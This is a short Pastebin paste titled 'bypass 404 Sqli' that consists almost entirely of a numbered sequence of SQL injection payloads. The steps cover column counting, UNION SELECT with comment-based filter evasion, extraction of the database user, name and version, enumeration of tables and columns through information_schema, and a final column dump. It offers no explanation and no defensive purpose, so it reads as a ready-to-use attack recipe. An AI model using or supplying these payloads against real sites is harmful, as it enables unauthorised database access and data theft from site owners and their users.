Advertisement
hqlan1928

bypass 404 Sqli

Dec 11th, 2013
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. b1: order by x,x-- -
  2. b2: union select x,x-- -
  3. b3: =-x' UNION /*!SELECT*/ x,x-- -
  4. b4: x,x,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
  5. b5: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database()-- -
  6. b6: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema./*!tables*/ where table_schema=database()-- -
  7. b7: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,column_name) from information_schema./*!columns*/ where table_name=0x(convert to hex)-- -
  8. b8: /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,abc),14,15,16,17,18 from xyz-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement